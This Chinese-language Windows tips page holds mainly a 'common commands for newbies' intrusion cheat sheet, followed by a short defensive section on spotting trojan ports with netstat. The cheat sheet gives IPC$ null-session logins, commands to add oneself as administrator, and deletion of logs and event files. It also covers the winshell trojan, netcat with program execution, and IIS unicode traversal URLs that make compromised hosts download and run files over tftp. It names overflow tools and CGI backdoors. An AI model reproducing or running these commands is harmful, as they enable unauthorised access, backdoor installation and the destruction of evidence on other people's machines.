26、Windows升级程序——Wupdmgr（system32文件夹下）
安装完windows后，在开始菜单的上方会有windows update菜单项，通过它能自动登录到microsoft公司的网站上完成自己windows的升级工作。但时间一长，可能会把这个快捷方式误删除了，这时我们就可以通过打开windows下的wupdmgr.exe文件来完成这个功能。
　　
Windows xp实为一个功能强大的*作系统，但只有充分地发挥其内置功能，才能更好地使用它。这也符合“基础的未必是最坏的，回到基础还是好的”的道理

菜鸟常用命令

（与远程主机建立空管连接） net use //ip地址/ipc$ "" /use:""
（以管理员身份登录远程主机） net use //ip地址/ipc$ "密码" /use:"administrator"
（传送文件到远程主机winnt目录下）copy 本机目录路径/程序 //ip地址/admin$
（查看远程主机时间） net time //ip地址
（定时启动某个程序） at //ip地址 02:18 readme.exe
（查看共享） net view //ip地址
（查看netbios工作组列表） nbtstat -a ip地址
（将远程主机c盘映射为自己的f盘） net use f: //ip地址/c$ ""/user:"administrator"
（这两条把自己增加到管理员组）： net user 用户名 密码 /add
net localgroup administrators 用户名 /add
（断开连接） net use //ip地址/ipc$ /delete
del c:/winnt/system32/logfiles/*.*
del c:/winnt/ssytem32/config/*.evt
del c:/winnt/system32/dtclog/*.*
del c:/winnt/system32/*.log
del c:/winnt/system32/*.txt
del c:/winnt/*.txt
del c:/winnt/*.log

一、netsvc.exe
下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务：
netsvc /list //ip地址
netsvc schedule //ip地址 /query
netsvc //ip地址 schedule /start

二、opentelnet.exe
远程启动主机的telnet服务，并绑定端口到7878，例如：
opentelnet //ip地址 用户名 密码 1 7878
然后就可以telnet到主机的7878端口，进入dos方式下：
telnet ip地址 7878

三、winshell.exe
一个非常小的木马（不到6k），telnet到主机的7878端口，输入密码winshell，当看到cmd>后，可打下面的命令：
p path （查看winshell主程序的路径信息）
b reboot （重新启动机器）
d shutdown （关闭机器）
s shell （执行后你就会看到可爱的“c:/>”）
x exit （退出本次登录会话，此命令并不终止winshell的运行）
cmd> http://.../srv.exe （通过http下载其他网站上的文件到运行winshell的机器上）

四、3389登陆器，gui方式登录远程主机的

五、elsave.exe
事件日志清除工具
elsave -s //ip地址 -l "application" -c
elsave -s //ip地址 -l "system" -c
elsave -s //ip地址 -l "security" -c
执行后成功清除应用程序日志，系统日志，安全日志

六、hbulot.exe
开启win2kserver和winxp的3389服务
hbulot [/r]
使用/r表示安装完成后自动重起目标使设置生效。

七、nc.exe(netcat.exe)
一个很好的工具，一些脚本程序都要用到它，也可做溢出后的连接用。
想要连接到某处: nc [-options] hostname port [ports] ...
绑定端口等待连接: nc -l -p port [-options] [hostname] [port]

参数:-e prog 程序重定向，一旦连接，就执行 [危险!!]
-g gateway source-routing hop point, up to 8
-g num source-routing pointer: 4, 8, 12, ...
-h 帮助信息
-i secs 延时的间隔
-l 监听模式，用于入站连接
-n 指定数字的ip地址，不能用hostname
-o file 记录16进制的传输
-p port 本地端口号
-r 任意指定本地及远程端口
-s addr 本地源地址
-u udp模式
-v 详细输出——用两个-v可得到更详细的内容
-w secs timeout的时间
-z 将输入输出关掉——用于扫描时

八、tftpd32.exe
把自己的电脑临时变为一台ftp服务器，让肉鸡来下载文件，tftp命令要在肉鸡上执行，通常要利用unicode漏洞或telnet到肉鸡，例如：
http://ip地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机ip地址 get 文件名 c:/winnt/system32/文件名
然后可以直接令文件运行：
http://ip地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名

九、prihack.exe是iis的printer远程缓冲区溢出工具
idqover.exe是溢出idq的，选择“溢出后在一个端口监听”，然后用telnet连接它的监听端口，如果溢出成功，一连它的端口，绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出，成功以后winxp下需要打winxp。
ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor，exe要放到cgi-bin目录下，asp放到有asp执行权限的目录。然后用ie浏览器连接。

十、弱口令
在nt/2000/xp/2003中弱口令可以用
Net use /ip “password” /user:user
如果目标机开3389服务,可以直接连接
在sql的sa弱口令可以用sql连接器直接 ·登陆

后门木马
如果有ipc$共享,可以copy过去木马后门
用at启动
AT /ip time /INTERACTIVE
如果可以得到shell,也可以用tftp
Tftp.exe ?Ci ip get *.* *.*
然后直接安装 ·如果有3389,可以自己建一个iis,下载 直接运行

       

 

管理特殊端口——防范木马攻击.
木马是一种带有恶意性质的远程控制软件，木马一般分为客户端(Client)和服务器端(Server)，客户端就是本地使用的各种命令的控制台，服务器端则是给别人运行，只有运行过服务器端的计算机才能够完全受控。

　　当前最为常见的木马通常是基于TCP/UDP协议进行client端与server端之间的通讯的，既然利用到这两个协议，就不可避免要在server端（就是被种了木马的机器了）打开监听端口来等待连接。例如鼎鼎大名的冰河使用的监听端口是7626，Back Orifice 2000则是使用54320等等。那么，我们可以利用查看本机开放端口的方法来检查自己是否被种了木马或其它hacker程序。以下是详细方法介绍。

　　Windows本身自带的netstat命令

　　Netstat显示协议统计和当前的 TCP/IP 网络连接。该命令只有在安装了 TCP/IP 协议后才可以使用。

　　netstat [-a] [-e] [-n] [-s] [-p protocol] [-r] [interval]

　　参数

　　-a 显示所有连接和侦听端口。服务器连接通常不显示。

　　-e 显示以太网统计。该参数可以与 -s 选项结合使用。

　　-n 以数字格式显示地址和端口号（而不是尝试查找名称）。

　　-s 显示每个协议的统计。默认情况下，显示 TCP、UDP、ICMP 和 IP 的统计。-p 选项可以用来指定默认的子集。

　　-p protocol 显示由 protocol 指定的协议的连接；protocol 可以是 tcp 或 udp。如果与 -s 选项一同使用显示每个协议的统计，protocol 可以是 tcp、udp、icmp 或 ip。

　　-r 显示路由表的内容。

　　interval 重新显示所选的统计，在每次显示之间暂停 interval 秒。按 CTRL+B 停止重新显示统计。如果省略该参数，netstat 将打印一次当前的配置信息。

　　现在，我们掌握netstat命令的使用方法了，下面就让我们现学现用，用这个命令看一下自己的机器开放的端口。进入到命令行下，使用netstat命令的a和n两个参数：

　　C:netstat -a -n

　　Active Connections

　　Proto Local ADDRess Foreign Address State

　　　　TCP 0.0.0.0:80 0.0.0.0:0 LISTENING

　　　　TCP 0.0.0.0:21 0.0.0.0:0 LISTENING

　　　　TCP 0.0.0.0:7626 0.0.0.0:0 LISTENING

　　　　UDP 0.0.0.0:445 0.0.0.0:0

　　　　UDP 0.0.0.0:1046 0.0.0.0:0

　　　　UDP 0.0.0.0:1047 0.0.0.0:0

　　解释一下，Active Connections是指当前本机活动连接，Proto是指连接使用的协议名称，Local Address是本地计算机的 IP 地址和连接正在使用的端口号，Foreign Address是连接该端口的远程计算机的 IP 地址和端口号，State则是表明TCP 连接的状态，你可以看到后面三行的监听端口是UDP协议的，所以没有State表示的状态。通过以上可以看出该机器的7626端口已经开放，正在监听等待连接，像这样的情况极有可能是已经感染了冰河！所以应该急忙断开网络，并用杀毒软件查杀病毒。